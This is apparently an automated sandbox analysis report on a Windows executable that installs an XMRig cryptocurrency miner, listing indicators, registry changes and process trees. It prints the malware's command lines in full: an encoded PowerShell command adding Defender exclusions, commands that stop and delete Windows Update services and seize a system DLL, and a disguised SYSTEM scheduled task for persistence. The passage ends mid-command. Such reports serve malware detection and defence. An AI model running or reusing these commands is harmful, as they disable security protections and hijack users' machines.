Analysis
-
max time kernel
299s -
max time network
249s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
15-05-2022 22:15
Static task
static1
Behavioral task
behavioral1
Sample
a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
Resource
win7-20220414-en
General
-
Target
a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
-
Size
7.6MB
-
MD5
95104aa61ed30687c13e5c644d5722f3
-
SHA1
f9788f808044d448f73203d93da0021cefb781ff
-
SHA256
a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
-
SHA512
99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
XMRig Miner Payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/4744-399-0x000000014036DB84-mapping.dmp xmrig behavioral2/memory/4744-398-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/4744-400-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/4744-401-0x0000000140000000-0x0000000140803000-memory.dmp xmrig behavioral2/memory/4744-404-0x0000000140000000-0x0000000140803000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
services.exepid process 3164 services.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 4228 icacls.exe 4852 takeown.exe 5016 icacls.exe 4188 takeown.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 4852 takeown.exe 5016 icacls.exe 4188 takeown.exe 4228 icacls.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.execonhost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
conhost.exedescription pid process target process PID 4428 set thread context of 4472 4428 conhost.exe conhost.exe PID 4428 set thread context of 4744 4428 conhost.exe svchost.exe -
Drops file in Program Files directory 3 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Program Files\Windows\services.exe conhost.exe File opened for modification C:\Program Files\Windows\services.exe conhost.exe File created C:\Program Files\Google\Libs\WR64.sys conhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 52 IoCs
Processes:
powershell.execonhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 4848 reg.exe 4264 reg.exe 4772 reg.exe 4808 reg.exe 3908 reg.exe 3624 reg.exe 4140 reg.exe 4200 reg.exe 4820 reg.exe 4064 reg.exe 2536 reg.exe 3896 reg.exe 4728 reg.exe 4068 reg.exe 5084 reg.exe 4792 reg.exe 3092 reg.exe 3364 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.execonhost.exepowershell.execonhost.exesvchost.exepid process 4692 powershell.exe 4692 powershell.exe 4692 powershell.exe 4652 conhost.exe 588 powershell.exe 588 powershell.exe 588 powershell.exe 4428 conhost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe 4744 svchost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 628 -
Suspicious use of AdjustPrivilegeToken 41 IoCs
Processes:
powershell.execonhost.exetakeown.exepowershell.execonhost.exetakeown.exesvchost.exedescription pid process Token: SeDebugPrivilege 4692 powershell.exe Token: SeIncreaseQuotaPrivilege 4692 powershell.exe Token: SeSecurityPrivilege 4692 powershell.exe Token: SeTakeOwnershipPrivilege 4692 powershell.exe Token: SeLoadDriverPrivilege 4692 powershell.exe Token: SeSystemProfilePrivilege 4692 powershell.exe Token: SeSystemtimePrivilege 4692 powershell.exe Token: SeProfSingleProcessPrivilege 4692 powershell.exe Token: SeIncBasePriorityPrivilege 4692 powershell.exe Token: SeCreatePagefilePrivilege 4692 powershell.exe Token: SeBackupPrivilege 4692 powershell.exe Token: SeRestorePrivilege 4692 powershell.exe Token: SeShutdownPrivilege 4692 powershell.exe Token: SeDebugPrivilege 4692 powershell.exe Token: SeSystemEnvironmentPrivilege 4692 powershell.exe Token: SeRemoteShutdownPrivilege 4692 powershell.exe Token: SeUndockPrivilege 4692 powershell.exe Token: SeManageVolumePrivilege 4692 powershell.exe Token: 33 4692 powershell.exe Token: 34 4692 powershell.exe Token: 35 4692 powershell.exe Token: 36 4692 powershell.exe Token: SeDebugPrivilege 4652 conhost.exe Token: SeTakeOwnershipPrivilege 4852 takeown.exe Token: SeDebugPrivilege 588 powershell.exe Token: SeAssignPrimaryTokenPrivilege 588 powershell.exe Token: SeIncreaseQuotaPrivilege 588 powershell.exe Token: SeSecurityPrivilege 588 powershell.exe Token: SeTakeOwnershipPrivilege 588 powershell.exe Token: SeLoadDriverPrivilege 588 powershell.exe Token: SeSystemtimePrivilege 588 powershell.exe Token: SeBackupPrivilege 588 powershell.exe Token: SeRestorePrivilege 588 powershell.exe Token: SeShutdownPrivilege 588 powershell.exe Token: SeSystemEnvironmentPrivilege 588 powershell.exe Token: SeUndockPrivilege 588 powershell.exe Token: SeManageVolumePrivilege 588 powershell.exe Token: SeDebugPrivilege 4428 conhost.exe Token: SeTakeOwnershipPrivilege 4188 takeown.exe Token: SeLockMemoryPrivilege 4744 svchost.exe Token: SeLockMemoryPrivilege 4744 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.execonhost.execmd.execmd.execmd.execmd.exeservices.exedescription pid process target process PID 3960 wrote to memory of 4652 3960 a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe conhost.exe PID 3960 wrote to memory of 4652 3960 a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe conhost.exe PID 3960 wrote to memory of 4652 3960 a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe conhost.exe PID 4652 wrote to memory of 2536 4652 conhost.exe cmd.exe PID 4652 wrote to memory of 2536 4652 conhost.exe cmd.exe PID 2536 wrote to memory of 4692 2536 cmd.exe powershell.exe PID 2536 wrote to memory of 4692 2536 cmd.exe powershell.exe PID 4652 wrote to memory of 2644 4652 conhost.exe cmd.exe PID 4652 wrote to memory of 2644 4652 conhost.exe cmd.exe PID 2644 wrote to memory of 4112 2644 cmd.exe sc.exe PID 2644 wrote to memory of 4112 2644 cmd.exe sc.exe PID 2644 wrote to memory of 4184 2644 cmd.exe sc.exe PID 2644 wrote to memory of 4184 2644 cmd.exe sc.exe PID 2644 wrote to memory of 1624 2644 cmd.exe sc.exe PID 2644 wrote to memory of 1624 2644 cmd.exe sc.exe PID 2644 wrote to memory of 4796 2644 cmd.exe sc.exe PID 2644 wrote to memory of 4796 2644 cmd.exe sc.exe PID 2644 wrote to memory of 4800 2644 cmd.exe sc.exe PID 2644 wrote to memory of 4800 2644 cmd.exe sc.exe PID 2644 wrote to memory of 4140 2644 cmd.exe reg.exe PID 2644 wrote to memory of 4140 2644 cmd.exe reg.exe PID 2644 wrote to memory of 4068 2644 cmd.exe reg.exe PID 2644 wrote to memory of 4068 2644 cmd.exe reg.exe PID 2644 wrote to memory of 4200 2644 cmd.exe reg.exe PID 2644 wrote to memory of 4200 2644 cmd.exe reg.exe PID 2644 wrote to memory of 4728 2644 cmd.exe reg.exe PID 2644 wrote to memory of 4728 2644 cmd.exe reg.exe PID 2644 wrote to memory of 3624 2644 cmd.exe reg.exe PID 2644 wrote to memory of 3624 2644 cmd.exe reg.exe PID 2644 wrote to memory of 4852 2644 cmd.exe takeown.exe PID 2644 wrote to memory of 4852 2644 cmd.exe takeown.exe PID 2644 wrote to memory of 5016 2644 cmd.exe icacls.exe PID 2644 wrote to memory of 5016 2644 cmd.exe icacls.exe PID 4652 wrote to memory of 1776 4652 conhost.exe cmd.exe PID 4652 wrote to memory of 1776 4652 conhost.exe cmd.exe PID 1776 wrote to memory of 4724 1776 cmd.exe schtasks.exe PID 1776 wrote to memory of 4724 1776 cmd.exe schtasks.exe PID 2644 wrote to memory of 4064 2644 cmd.exe reg.exe PID 2644 wrote to memory of 4064 2644 cmd.exe reg.exe PID 2644 wrote to memory of 4848 2644 cmd.exe reg.exe PID 2644 wrote to memory of 4848 2644 cmd.exe reg.exe PID 2644 wrote to memory of 3092 2644 cmd.exe conhost.exe PID 2644 wrote to memory of 3092 2644 cmd.exe conhost.exe PID 2644 wrote to memory of 3364 2644 cmd.exe reg.exe PID 2644 wrote to memory of 3364 2644 cmd.exe reg.exe PID 2644 wrote to memory of 4452 2644 cmd.exe schtasks.exe PID 2644 wrote to memory of 4452 2644 cmd.exe schtasks.exe PID 2644 wrote to memory of 3808 2644 cmd.exe schtasks.exe PID 2644 wrote to memory of 3808 2644 cmd.exe schtasks.exe PID 2644 wrote to memory of 4988 2644 cmd.exe schtasks.exe PID 2644 wrote to memory of 4988 2644 cmd.exe schtasks.exe PID 2644 wrote to memory of 4860 2644 cmd.exe schtasks.exe PID 2644 wrote to memory of 4860 2644 cmd.exe schtasks.exe PID 2644 wrote to memory of 4580 2644 cmd.exe schtasks.exe PID 2644 wrote to memory of 4580 2644 cmd.exe schtasks.exe PID 2644 wrote to memory of 4832 2644 cmd.exe schtasks.exe PID 2644 wrote to memory of 4832 2644 cmd.exe schtasks.exe PID 2644 wrote to memory of 4268 2644 cmd.exe schtasks.exe PID 2644 wrote to memory of 4268 2644 cmd.exe schtasks.exe PID 4652 wrote to memory of 3140 4652 conhost.exe cmd.exe PID 4652 wrote to memory of 3140 4652 conhost.exe cmd.exe PID 3140 wrote to memory of 3844 3140 cmd.exe schtasks.exe PID 3140 wrote to memory of 3844 3140 cmd.exe schtasks.exe PID 3164 wrote to memory of 4428 3164 services.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f1⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll1⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q1⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f1⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f1⤵
- Modifies registry key
-
C:\Windows\system32\sc.exesc stop dosvc1⤵
-
C:\Windows\system32\sc.exesc stop bits1⤵
-
C:\Windows\system32\sc.exesc stop wuauserv1⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc1⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc1⤵
-
C:\Program Files\Windows\services.exe"C:\Program Files\Windows\services.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN 